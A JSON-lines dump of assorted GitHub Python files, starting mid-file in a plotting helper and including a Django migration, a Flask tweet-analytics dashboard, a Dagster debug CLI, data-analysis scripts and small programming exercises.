plt.tight_layout(pad=1.5)\n \n if savefig:\n plt.savefig(folder + '/' + filename + '.png',transparent=transparent)\n\n plt.show()\n \n\ndef bar_plot(X,Y,xlabel,ylabel,\n title='',\n ymax = 0.1, \n ymin = 0.1,\n tick_increment = None,\n showplot = False,\n save_plot = False,\n transparent = False,\n grid = False, \n folder = None,\n filename = 'Plot',\n num_col = 2,\n legend_loc = 'upper right',\n experimental_args = None,\n xlabelpad = 5, \n hide_origin = False, \n for_notebook=False,\n template='publication',\n file_type='pdf'):\n \n if template.lower() == 'large':\n plt.figure(figsize=(10,6.67))\n elif template.lower() == 'wide':\n plt.figure(figsize=(12,4))\n else:\n plt.figure()\n\n # Customize the axes\n ax = plt.gca()\n \n plt.bar([str(value) for value in X],Y)\n \n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n \n # Show the grid, if desired\n ax.grid(grid)\n ax.set_axisbelow(True)\n\n # Create the axis labels\n plt.xlabel(r'\\textbf{' + xlabel + '}', labelpad=xlabelpad)\n plt.ylabel(r'\\textbf{' + ylabel + '}', labelpad=5)\n plt.title(r'\\textbf{' + title + '}',fontsize=22)\n\n # Adjust the page layout filling the page using the new tight_layout command\n plt.tight_layout(pad=1.2) \n \n \n\n if save_plot:\n if folder is not None:\n # Ensure that the folder we want to save to exists\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n filename = folder + '/' + filename\n\n # Save the pdf of the plot \n if file_type == 'png':\n plt.savefig('{}.png'\\\n .format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename),transparent=transparent) \n\n if showplot:\n plt.show()\n\n # Clear the axes and figure\n plt.clf()\n plt.cla()\n plt.close()\n","repo_name":"danielnewman09/Dissertation","sub_path":"Dissertation-Notebooks/dependencies/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":42669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25648860801","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('diseases', '0006_case_location'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Location',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('name', models.CharField(max_length=300)),\n ],\n ),\n migrations.AlterField(\n model_name='case',\n name='location',\n field=models.ForeignKey(to='diseases.Location'),\n ),\n ]\n","repo_name":"Omrigan/diseases","sub_path":"diseases/migrations/0007_auto_20150518_0945.py","file_name":"0007_auto_20150518_0945.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44668266350","text":"# ====================================\r\n# COMP90024 Cluster and Cloud Computing\r\n# Group 22 - Assignment 2\r\n# Ran Liang 1162222\r\n# Yulun Huang 910398\r\n# Yubo Sun 1048638\r\n# Yanhao Wang 1142087\r\n# Xindi Fang 749394\r\n# Last Updated: 2021-05-25\r\n# Description:\r\n# Related DB Name:\r\n# ====================================\r\n\r\nfrom flask import Flask\r\nfrom flask import render_template\r\nfrom flask import jsonify\r\nfrom flask import request\r\nfrom datetime import timedelta\r\nimport utils_source\r\nimport utils_time\r\nimport utils_vaccine\r\nimport util_unemployment\r\nimport utils_language\r\n\r\napp = Flask(__name__)\r\napp.config['DEBUG'] = True\r\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = timedelta(seconds=1)\r\n\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('main.html')\r\n\r\n\r\n@app.route('/main.html', methods=['GET', 'POST'])\r\ndef main_page():\r\n return render_template('main.html')\r\n\r\n\r\n@app.route('/language.html', methods=['GET', 'POST'])\r\ndef language():\r\n return render_template('language.html')\r\n\r\n\r\n@app.route('/source.html', methods=['GET', 'POST'])\r\ndef source():\r\n return render_template('source.html')\r\n\r\n\r\n@app.route('/period.html', methods=['GET', 'POST'])\r\ndef period():\r\n return render_template('period.html')\r\n\r\n\r\n@app.route('/vaccine.html', methods=['GET', 'POST'])\r\ndef vaccine():\r\n return render_template('vaccine.html')\r\n\r\n\r\n@app.route('/unemployment.html', methods=['GET', 'POST'])\r\ndef unemployment():\r\n return render_template('unemployment.html')\r\n\r\n\r\n@app.route('/aboutUs.html', methods=['GET', 'POST'])\r\ndef about_us():\r\n return render_template('aboutUs.html')\r\n# 1 -------------------------------------------------------------- Language start\r\n@app.route('/language/l1')\r\ndef get_language_l1_data():\r\n language_l1_data = utils_language.get_language_l1_data()\r\n return jsonify(language_l1_data)\r\n\r\n\r\n@app.route('/language/l2')\r\ndef get_language_l2_data():\r\n language_l2_data = utils_language.get_language_l2_data()\r\n return jsonify(language_l2_data)\r\n\r\n\r\n@app.route('/language/c1')\r\ndef get_language_c1_scatter_data():\r\n language_c1_scatter_data = utils_language.get_language_c1_data()\r\n return jsonify(language_c1_scatter_data)\r\n\r\n\r\n@app.route('/language/r1', methods=['GET', 'POST'])\r\ndef get_language_r1_data():\r\n language_r1_data = utils_language.get_language_r1_data()\r\n return jsonify(language_r1_data)\r\n\r\n\r\n@app.route('/language/r2', methods=['GET', 'POST'])\r\ndef get_language_r2_data():\r\n language_r2_data = utils_language.get_language_r2_data()\r\n\r\n return jsonify(language_r2_data)\r\n\r\n\r\n# 1 -------------------------------------------------------------- Language end\r\n\r\n# 2 -------------------------------------------------------------- Source start\r\n\r\n@app.route('/source/l1')\r\ndef get_source_l1_data():\r\n source_l1_data = {'legend': ['Android', 'IOS'], 'xAxis': [str(i).zfill(2) for i in range(24)],\r\n 'data': utils_source.source_time_plot()}\r\n return jsonify(source_l1_data)\r\n\r\n\r\n@app.route('/source/l2')\r\ndef get_source_l2_data():\r\n source_l2_data = {'legend': ['polarity', 'subjectivity'], 'xAxis': ['Android', 'IOS'],\r\n 'data': utils_source.source_polarity_subjectivity()}\r\n return jsonify(source_l2_data)\r\n\r\n\r\n@app.route('/source/c12')\r\ndef get_source_c12_scatter_data():\r\n # 前一个IOS后一个android.\r\n android_data, ios_data = utils_source.source_region_pol()\r\n source_c12_scatter_data = {'android': android_data, 'ios': ios_data}\r\n return jsonify(source_c12_scatter_data)\r\n\r\n\r\n@app.route('/source/r1')\r\ndef get_source_r1_data():\r\n source_r1_data = {'legend': ['Android', 'IOS'],\r\n 'yAxis': ['Sydney', 'Melbourne', 'Brisbane', 'Perth (WA)', 'Adelaide',\r\n 'Gold Coast', 'Canberra', 'Newcastle'],\r\n 'data': utils_source.source_region_percentage()}\r\n return jsonify(source_r1_data)\r\n\r\n\r\n@app.route('/source/r2', methods=['GET', 'POST'])\r\ndef get_source_r2_data():\r\n source_r2_original_data = utils_source.source_cloud()\r\n source_r2_data = {'android': source_r2_original_data[0]['Twitter for Android'],\r\n 'ios': source_r2_original_data[1]['Twitter for iPhone']\r\n }\r\n return jsonify(source_r2_data)\r\n\r\n\r\n# 2 -------------------------------------------------------------- Source end\r\n\r\n# 3 -------------------------------------------------------------- Period start\r\n@app.route('/period/l1')\r\ndef get_period_l1_data():\r\n period_l1_data = {'xAxis': [str(i).zfill(2) for i in range(24)],\r\n 'data': utils_time.time_count_trend()}\r\n return jsonify(period_l1_data)\r\n\r\n\r\n@app.route('/period/l2')\r\ndef get_period_l2_data():\r\n period_l2_data = {'legend': ['polarity', 'subjective'],\r\n 'xAxis': [str(i).zfill(2) for i in range(24)],\r\n 'data': utils_time.time_sub_pol_trend()}\r\n return jsonify(period_l2_data)\r\n\r\n\r\n@app.route('/period/c1')\r\ndef get_period_c1_scatter_data():\r\n period_c1_scatter_data = {'timeline': [str(i).zfill(2) for i in range(24)],\r\n 'data': utils_time.time_map_24()}\r\n return jsonify(period_c1_scatter_data)\r\n\r\n\r\n@app.route('/period/r1')\r\ndef get_period_r1_data():\r\n period_r1_data = {'periods': [str(i).zfill(2) for i in range(24)],\r\n 'xAxis': ['Sydney', 'Melbourne', 'Brisbane', 'Perth (WA)', 'Adelaide',\r\n 'Gold Coast', 'Canberra', 'Newcastle'],\r\n 'data': utils_time.time_region_count_percent_plot()}\r\n return jsonify(period_r1_data)\r\n\r\n\r\n@app.route('/period/r2', methods=['GET', 'POST'])\r\ndef get_period_r2_data():\r\n period_r2_data = utils_time.time_cloud()\r\n\r\n return jsonify(period_r2_data)\r\n\r\n\r\n# 3 -------------------------------------------------------------- Period end\r\n\r\n# 4 -------------------------------------------------------------- Vaccine start\r\n@app.route('/vaccine/l1')\r\ndef get_vaccine_l1_data():\r\n vaccine_l1_original_date = utils_vaccine.vaccine_date_count()\r\n vaccine_l1_data = {'xAxis': vaccine_l1_original_date[0],\r\n 'data': vaccine_l1_original_date[1]}\r\n return jsonify(vaccine_l1_data)\r\n\r\n\r\n@app.route('/vaccine/l2')\r\ndef get_vaccine_l2_data():\r\n vaccine_l2_original_data = utils_vaccine.vaccine_date_polarity_sub()\r\n source_l2_data = {'legend': ['polarity', 'subjective'],\r\n 'xAxis': vaccine_l2_original_data[0],\r\n 'data': [vaccine_l2_original_data[1], vaccine_l2_original_data[2]]}\r\n return jsonify(source_l2_data)\r\n\r\n\r\n@app.route('/vaccine/c1')\r\ndef get_vaccine_c1_scatter_data():\r\n vaccine_c1_scatter_data = {'data_name': 'Average polarity about vaccine',\r\n 'data': utils_vaccine.vaccine_map()}\r\n return jsonify(vaccine_c1_scatter_data)\r\n\r\n\r\n@app.route('/vaccine/r1')\r\ndef get_vaccine_r1_data():\r\n vaccine_r1_data = {'legend': ['Question 1 Disagree', 'Question 1 Neutral', 'Question 1 Agree',\r\n 'Question 2 Disagree', 'Question 2 Neutral', 'Question 2 Agree'],\r\n 'data': utils_vaccine.vaccine_aurin_compare()}\r\n return jsonify(vaccine_r1_data)\r\n\r\n\r\n@app.route('/vaccine/r2', methods=['GET', 'POST'])\r\ndef get_vaccine_r2_data():\r\n vaccine_r2_data = utils_vaccine.vaccine_cloud()\r\n\r\n return jsonify(vaccine_r2_data)\r\n\r\n\r\n# 4 -------------------------------------------------------------- Vaccine end\r\n\r\n# 5 -------------------------------------------------------------- Unemployment start\r\n@app.route('/unemployment/l1')\r\ndef get_unemployment_l1_data():\r\n unemployment_l1_original_data = util_unemployment.unemp_date_count()\r\n unemployment_l1_data = {'xAxis': unemployment_l1_original_data[0],\r\n 'data': unemployment_l1_original_data[1]}\r\n return jsonify(unemployment_l1_data)\r\n\r\n\r\n@app.route('/unemployment/l2')\r\ndef get_unemployment_l2_data():\r\n unemployment_l2_data = util_unemployment.unemp_date_polarity_sub()\r\n unemployment_l2_data = {'legend': ['polarity', 'subjective'],\r\n 'xAxis': unemployment_l2_data[0],\r\n 'data': [unemployment_l2_data[1], unemployment_l2_data[2]]}\r\n return jsonify(unemployment_l2_data)\r\n\r\n\r\n@app.route('/unemployment/c1')\r\ndef get_unemployment_scatter_c1_data():\r\n unemployment_scatter_c1_data = {'data_name': 'Average polarity for unemployment',\r\n 'data': util_unemployment.unemp_map()}\r\n return jsonify(unemployment_scatter_c1_data)\r\n\r\n\r\n@app.route('/unemployment/r1')\r\ndef get_unemployment_r1_data():\r\n unemployment_r1_original_data = util_unemployment.unemp_with_aurin()\r\n unemployment_r1_data = {'legend': unemployment_r1_original_data[0],\r\n 'xAxis': [unemployment_r1_original_data[1], unemployment_r1_original_data[2]],\r\n 'data': [unemployment_r1_original_data[3], unemployment_r1_original_data[4]]}\r\n return jsonify(unemployment_r1_data)\r\n\r\n\r\n@app.route('/unemployment/r2')\r\ndef get_unemployment_r2_data():\r\n unemployment_r2_data = util_unemployment.unemployment_cloud()\r\n return jsonify(unemployment_r2_data)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host=\"0.0.0.0\", port=5000)\r\n","repo_name":"TyrionGump/COMP90024_proj2","sub_path":"frontend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37826808288","text":"from sklearn.cluster import KMeans\r\nfrom sklearn.utils import resample\r\nimport numpy as np\r\nfrom tmp_rate_clusters import rate_cluster, upsample_class\r\n\r\n#load raw numeric data\r\nf = open(\"Hadoop_EventCount\",\"r\")\r\nx, y = len(f.readline().split()), 0\r\nf.close()\r\nf = open(\"Hadoop_EventCount\",\"r\")\r\nfor line in f:\r\n y+=1\r\nf.close()\r\nx_values, y_values = np.zeros((y,x-1)), np.zeros((y,))\r\nf = open(\"Hadoop_EventCount\",\"r\")\r\nindex = 0\r\nfor line in f:\r\n data = line.split()\r\n y_values[index], x_values[index] = data[0], data[1:]\r\n index+=1\r\n\r\n#upsample\r\nx_values, y_values = upsample_class(x_values, y_values, upsample_class=0, ratio=5)\r\n#downsample\r\nx_values, y_values = resample(x_values, y_values, n_samples = 100)\r\n\r\n#cluster\r\n#get a list of cluster labels\r\ncluster_count = 80\r\nkmeans = KMeans(init=\"random\", n_clusters=cluster_count, random_state=0).fit(x_values)\r\ncluster_labels = kmeans.predict(x_values)\r\n\r\n#evaluate\r\nscores = rate_cluster(cluster_labels, y_values, cluster_count, online_clusters=[], online_classes=[])\r\nprint(\"final scores\")\r\nprint(scores)","repo_name":"alexleeuci/eecs159a","sub_path":"loglizer/LogClusteringHadoopDemos_unrefined/tmp_cluster_and_eval.py","file_name":"tmp_cluster_and_eval.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28140989736","text":"import numpy as np\n\nf = open(\"timestat.txt\", \"r\")\nll1 = (f.read()).split(\"\\n\\n\")\nf.close()\nll2 = [i.strip() for i in ll1]\n\nreal = [i.split(\"\\n\")[0].split(\" \")[-1].strip() for i in ll2]\nreal = [int(i.split('m')[0]) * 60 + float(i.split('m')[1][:-1]) for i in real]\n# print(len(real))\n\nuser = [i.split(\"\\n\")[1].split(\" \")[-1].strip() for i in ll2]\nuser = [int(i.split('m')[0]) * 60 + float(i.split('m')[1][:-1]) for i in user]\n\nsys = [i.split(\"\\n\")[2].split(\" \")[-1].strip() for i in ll2]\nsys = [int(i.split('m')[0]) * 60 + float(i.split('m')[1][:-1]) for i in sys]\n\n\nreal = np.array(real)\nuser = np.array(user)\nsys = np.array(sys)\n\nreal_avg = np.mean(real)\nuser_avg = np.mean(user)\nsys_avg = np.mean(sys)\n\nreal_std = np.std(real)\nuser_std = np.std(user)\nsys_std = np.std(sys)\n\n\ndef within_func(x, s, e):\n label = 0\n if (x >= s and x <= e):\n label = 1\n \n return label\n\nnum_real = sum([within_func(i, real_avg - real_std, real_avg + real_std) for i in real])\n# print(num_real)\nnum_user = sum([within_func(i, user_avg - user_std, user_avg + user_std) for i in user])\nnum_sys = sum([within_func(i, sys_avg - sys_std, sys_avg + sys_std) for i in sys])\n\n\nprint(\"Number of runs: \", len(real))\nprint(\"Average Time statistics\")\nprint(\"real: \", str(round(real_avg, 4)) + \"s\", \" user: \", str(round(user_avg, 4)) + \"s\", \" sys: \", str(round(sys_avg, 4)) + \"s\")\nprint(\"Standard deviation of Time statistics\")\nprint(\"real: \", str(round(real_std, 4)) + \"s\", \" user: \", str(round(user_std, 4)) + \"s\", \" sys: \", str(round(sys_std, 4)) + \"s\")\nprint(\"Number of runs within (average - standard deviation) to (average + standard deviation)\")\nprint(\"real: \", num_real, \" user: \", num_user, \" sys: \", num_sys)","repo_name":"Riyaagrawal2001/wncc-timestat","sub_path":"timestat.py","file_name":"timestat.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9887445977","text":"from gzip import GzipFile\nfrom typing import List, Tuple\n\nimport click\nfrom tqdm import tqdm\n\nfrom dagster._core.debug import DebugRunPayload\nfrom dagster._core.storage.dagster_run import DagsterRunStatus, RunsFilter\nfrom dagster._serdes import deserialize_value\n\nfrom .utils import get_instance_for_cli\n\n\ndef _recent_failed_runs_text(instance):\n lines = []\n runs = instance.get_runs(\n limit=5,\n filters=RunsFilter(statuses=[DagsterRunStatus.FAILURE, DagsterRunStatus.CANCELED]),\n )\n if len(runs) <= 0:\n return \"\"\n for run in runs:\n lines.append(f\"{run.run_id:<50}{run.job_name:<50}{run.status:<20}\")\n return \"Recently failed runs:\\n{}\".format(\"\\n\".join(lines))\n\n\ndef export_run(instance, run, output_file):\n debug_payload = DebugRunPayload.build(instance, run)\n with GzipFile(output_file, \"wb\") as file:\n click.echo(f\"Exporting run_id '{run.run_id}' to gzip output file {output_file}.\")\n debug_payload.write(file)\n\n\n@click.group(name=\"debug\")\ndef debug_cli():\n \"\"\"Commands for helping debug Dagster issues by dumping or loading artifacts from specific runs.\n\n This can be used to send a file to someone like the Dagster team who doesn't have direct access\n to your instance to allow them to view the events and details of a specific run.\n\n Debug files can be viewed using `dagster-webserver-debug` cli.\n Debug files can also be downloaded from the Dagster UI.\n \"\"\"\n\n\n@debug_cli.command(\n name=\"export\",\n help=\"Export the relevant artifacts for a job run from the current instance in to a file.\",\n)\n@click.argument(\"run_id\", type=str)\n@click.argument(\"output_file\", type=click.Path())\ndef export_command(run_id, output_file):\n with get_instance_for_cli() as instance:\n run = instance.get_run_by_id(run_id)\n if run is None:\n raise click.UsageError(\n f\"Could not find run with run_id '{run_id}'.\\n{_recent_failed_runs_text(instance)}\"\n )\n\n export_run(instance, run, output_file)\n\n\n@debug_cli.command(\n name=\"import\", help=\"Import the relevant artifacts from debug files in to the current instance.\"\n)\n@click.argument(\"input_files\", nargs=-1, type=click.Path(exists=True))\ndef import_command(input_files: Tuple[str, ...]):\n debug_payloads: List[DebugRunPayload] = []\n for input_file in input_files:\n with GzipFile(input_file, \"rb\") as file:\n blob = file.read().decode(\"utf-8\")\n debug_payload = deserialize_value(blob, DebugRunPayload)\n debug_payloads.append(debug_payload)\n\n with get_instance_for_cli() as instance:\n for debug_payload in debug_payloads:\n run = debug_payload.dagster_run\n click.echo(f\"Importing run {run.run_id} (Dagster: {debug_payload.version})\")\n if not instance.has_snapshot(run.execution_plan_snapshot_id): # type: ignore # (possible none)\n instance.add_snapshot(\n debug_payload.execution_plan_snapshot,\n run.execution_plan_snapshot_id,\n )\n if not instance.has_snapshot(run.job_snapshot_id): # type: ignore # (possible none)\n instance.add_snapshot(\n debug_payload.job_snapshot,\n run.job_snapshot_id,\n )\n\n if not instance.has_run(run.run_id):\n instance.add_run(run)\n\n for event in tqdm(debug_payload.event_list):\n instance.store_event(event)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_cli/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"34383540924","text":"import argparse\nimport moviepy.editor as mp\nimport os\n\n\ndef extract_audio(video_file_path, output_file_path):\n \"\"\"\n 从视频中提取出音频文件\n :param video_file_path: 视频文件路径\n :param output_file_path: 音频文件保存路径\n :return: 音频文件路径\n \"\"\"\n path = os.getcwd()\n my_clip = mp.VideoFileClip(video_file_path)\n output_dir_path = os.path.join(path, output_file_path)\n audio_path = os.path.join(output_dir_path, os.path.basename(video_file_path)) + \".mp3\"\n # 创建保存路径文件夹(存在则跳过)\n os.makedirs(os.path.dirname(audio_path), exist_ok=True)\n my_clip.audio.write_audiofile(audio_path)\n return audio_path\n\n\ndef file_exists(file_path):\n \"\"\"\n 检查文件路径是否存在\n :param file_path: 文件路径\n :return: 存在则返回文件路径,否则返回False\n \"\"\"\n path = os.getcwd()\n if os.path.isfile(os.path.join(path, file_path)):\n return os.path.join(path, file_path)\n elif os.path.isfile(file_path):\n return file_path\n else:\n return False\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Extract audio from a video file')\n parser.add_argument('video_file_path', type=str, nargs='?', default='./video/1.mp4', help='Path to the video file')\n parser.add_argument('output_file_path', type=str, nargs='?', default='audio', help='Path to save the extracted audio file')\n args = parser.parse_args()\n\n video_file_path = file_exists(args.video_file_path)\n output_file_path = args.output_file_path\n\n if video_file_path:\n try:\n audio_path = extract_audio(video_file_path, output_file_path)\n print(\"提取视频音频文件成功\")\n print(\"音频文件已保存至\" + audio_path)\n except Exception as e:\n print('提取视频音频文件失败')\n print(\"错误信息:\", e)\n else:\n print(\"文件路径错误!\")\n","repo_name":"ironartisan/videoParse","sub_path":"extra_audio.py","file_name":"extra_audio.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73675889129","text":"laptop = {\n \"HP\": 20,\n \"DELL\": 50,\n \"MACBOOK\": 12,\n \"ASUS\": 30\n}\n\nlaptop[\"lenovo\"] = laptop[\"ASUS\"]\ndel laptop[\"ASUS\"]\nprint(laptop)\nprint(\"Số lượng Macbook có trong shop:\", laptop[\"MACBOOK\"])\n\nprint(\"Nhập thông tin: \", end=\"\")\ninfor = input()\n\nif infor.isdigit():\n i = 0\n index_value = list(laptop.values())\n index_key = list(laptop.keys())\n for value in index_value:\n if int(value) == int(infor):\n print(index_key[i])\n i += 1\nelse:\n print(laptop[infor])\n\n\n","repo_name":"vinhdq2005/vinhdq2005.github.io","sub_path":"mk-CSB08/csb01/lesson9/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21180948345","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport data_frame_creation\n\ndf_list = data_frame_creation.create_TV_data_frames()\ndf = df_list[0]\ndf_first_10 = df_list[1]\nfirst_10_binge = df_list[2]\nfirst_10_serial = df_list[3]\n#initial code in place to call the dataframe creation function and get the set of dataframes we need\n\ndef dual_hist_plot(df_1, df_2):\n #takes in two dataframes and returns a dual histogram of both layered on top of eachother\n fig = plt.figure()\n plt.style.use('seaborn')\n sns.set_palette('colorblind')\n hist_serial = sns.distplot(df_1['imdb_score'], kde = False)\n hist_binge = sns.distplot(first_10_binge['imdb_score'], kde = False)\n fig.legend(labels=['Serial','Batch'])\n hist_serial.set_xlabel('IMDb Score')\n plt.show()\n\ndef box_plot(df):\n #takes in a dataframe and returns of a box and whisker plot of imdb score by episode\n fig = plt.figure()\n plt.style.use('seaborn')\n sns.set_palette('colorblind')\n ax = sns.catplot(x=\"episode\", y=\"imdb_score\", hue=\"binge_release\", data=df, kind=\"box\")\n ax.set_axis_labels(\"Episode Number\", \"IMDb Score\")\n plt.title('Score by Episode')\n ax._legend.set_title('Release Type')\n plt.show()\n\n#box_plot()\n\ndef simple_box_plot(df):\n #takes a dataframe and creates a two-part box and whisker grouping the data by release type\n fig = plt.figure()\n plt.style.use('seaborn')\n sns.set_palette('colorblind')\n ax = sns.boxplot(x= 'binge_release', y = 'imdb_score', data = df)\n ax.set_ylabel('IMDb Score')\n ax.set_xlabel('Release Type')\n plt.show()\n\n#simple_box_plot()\n","repo_name":"j-gilkey/TV-Release-Frequency-Analysis","sub_path":"chart_creation.py","file_name":"chart_creation.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2667445671","text":"import torch\nfrom torch import nn\nfrom torch.nn import Linear\n\nclass MLR(nn.Module):\n def __init__(self, input_size, output_size):\n super(MLR,self).__init__()\n self.linear = nn.Linear(input_size, output_size)\n \n def forward(self, x):\n out = self.linear(x)\n return out\n\nif __name__ == '__main__':\n torch.manual_seed(1)\n \n print('\\n================================')\n X = torch.tensor([[1.0,1.0],[1.0,2.0],[1.0,3.0]])\n print(X)\n print(X.shape)\n \n \n model_lr = Linear(2,2)\n print(list(model_lr.parameters()))\n print(model_lr.state_dict())\n Yhat = model_lr(X)\n print(Yhat)\n\n \n print('\\n================================')\n model_custon = MLR(2,2)\n print(list(model_custon.parameters()))\n print(model_custon.state_dict())\n Yhat = model_custon(X)\n print(Yhat)\n\n \n \n ","repo_name":"AngelFelipeMP/Deep-Neural-Networks-with-Pytorch","sub_path":"Week3/Linear_Regression_Multiple_Outputs.py","file_name":"Linear_Regression_Multiple_Outputs.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38066422660","text":"\"\"\" Use a dictionary to store information about a person you know.\nStore their first name, last name, age, and the city in which they live .\nYou should have keys such as first_name, last_name, age, and city .\nPrint each piece of information stored in your dictionary .\"\"\"\n\n#person dictionary\nperson = {\n 'first_name':'David',\n 'last_name':'Jhon',\n 'age':72,\n 'city':'Las Vegas'\n }\nprint (\"the dictionary of person: \",person)\nprint (f\"the age of {person['first_name']} is {person['age']} old.\")\n\nfor key,value in person.items():# to loop all items in the dictionaries\n print('key:',key)\n print('value:',value)\n print('')\n \nfor key in person.keys():#only to print keys of the keys\n print('only the key: ',key)\n \nfor value in person.values():#to print only values of the dictionaries\n print('only the value: ',value)\n\n#persons dictionaries with thier countries\npersons = {\n 'Hanna':'USA',\n 'Anita':'India',\n 'Sami':' Egypt',\n 'Pedro':'Italy'\n }\nprint(\"persons with the countries: \",persons)\n\nfor name,country in persons.items():\n print (f\"Hi {name}, I think you are from {country}.\")\n \nguests = ['Abdu','Phil','Anita']\nfor guest in guests: #check if guest is in the dictionary.\n if guest in persons.keys():\n print(f\"Hi {guest}, thank for submiting\")\n \n else:\n print(f\"Hi {guest}, please fill the form.\")\n\n#list in dictionary\n#store information about a pizza being ordered\npizza = {\n 'crust': 'thick',\n 'toppings': ['mushrooms','cheese']\n }\n#to print the whole information\nprint(f\"you have ordered {pizza['crust']}\")\nfor topping in pizza['toppings']:\n print (\"\\t:\"+topping)\n \n#morethan one items in the list of dictionary\nfavorite_languages = {\n 'jen': ['python', 'ruby'],\n 'sarah': ['c'],\n 'edward': ['ruby', 'go'],\n 'phil': ['python', 'haskell'],\n }\nfor name, languages in favorite_languages.items():\n print(f\"{name}'s favorite_language are:\")\n for language in languages:\n print(f\"\\t{language}\")\n#many users\nusers = {\n 'Einstein': {\n 'first': 'Albert',\n 'last': 'Einstein',\n 'location': 'princeton',\n },\n 'Mcurie': {\n 'first': 'marie',\n 'last': 'curie',\n 'location': 'paris',\n },\n }\nfor username,userinfo in users.items():\n print(\"\\nUsername: \" + username)\n full_name = userinfo['first'] + \" \" + userinfo['last']\n location = userinfo['location']\n print(\"\\tfull_name: \" + full_name.title())\n print(\"\\tlocation: \" + location.title())\n \n# Make an empty list to store the pets in.\npets = []\n\n# Make individual pets, and store each one in the list.\npet = {\n 'animal type': 'python',\n 'name': 'John',\n 'owner': 'Guido',\n 'weight': 43,\n 'eats': 'bugs',\n}\npets.append(pet)\npet = {\n 'animal type': 'chicken',\n 'name': 'Clarence',\n 'owner': 'Tiffany',\n 'weight': 2,\n 'eats': 'seeds',\n}\npets.append(pet)\n\npet = {\n 'animal type': 'dog',\n 'name': 'Peso',\n 'owner': 'Eric',\n 'weight': 37,\n 'eats': 'shoes',\n}\npets.append(pet)\nprint(pets)\n\n# Display information about each pet.\nfor pet in pets:\n print(f\"the pet owner is: {pet['name'].title()}\")\n for key, value in pet.items():\n #print(f\"animal type: {key['animal type'].title()}\")\n #print(f\"owner: {key['owner'].titel()}\")\n print(f\"\\t{key} : {value}\")\n\n\n#favorite places\nfavorite_places = {'John':'Cairo','David':'Tokyo','Susan':'Las Vegas'}\nfor name, city in favorite_places.items():\n print(f\"{name},your favorite city is {city}\")\n\n#cities information\ncities = {\n 'Jakarta':{\n 'country':'indonsia',\n 'population':'30M',\n 'fact':'cool area',\n },\n 'Roma': {\n 'country':'Italy',\n 'population':'3M',\n 'fact':'old city',\n },\n 'Cairo':{\n 'country':'Egypy',\n 'population':'100M',\n 'fact':'Pyramid',\n }\n }\nprint(cities)\nfor city,info in cities.items():\n print (f\"the information about {city} are: \")\n print(f\"\\t country of the city: {info['country']}\")\n print(f\"\\t population of the city: {info['population']}\")\n print(f\"\\t fact of the city: {info['fact']}\")\n print(\"\")\n \n","repo_name":"Filaraya/Daily-Python-Exercise","sub_path":"Dictionaries.py","file_name":"Dictionaries.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21253605306","text":"\"\"\"\nGiven a binary tree, populate an array to represent its level-by-level traversal in reverse order, i.e., the lowest level comes first. You should populate the values of all nodes in each level from left to right in separate sub-arrays.\n\"\"\"\nfrom collections import deque\n\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\ndef traverse(root):\n result = deque()\n elements = deque([root])\n while elements :\n size = len(elements)\n data = []\n while size > 0 :\n size -= 1\n n = elements.popleft()\n data.append(n.val)\n if n.left :\n elements.append(n.left)\n if n.right :\n elements.append(n.right)\n result.appendleft(data)\n return result\n\ndef main():\n root = TreeNode(12)\n root.left = TreeNode(7)\n root.right = TreeNode(1)\n root.left.left = TreeNode(9)\n root.right.left = TreeNode(10)\n root.right.right = TreeNode(5)\n print(\"Reverse level order traversal: \" + str(traverse(root)))\n\n\nmain()\n","repo_name":"SharadGupta26/Data-Structures-Problems","sub_path":"Educative Course Solutions/Tree_Breadth_First_Search/Reverse_Level_Order_Traversal.py","file_name":"Reverse_Level_Order_Traversal.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 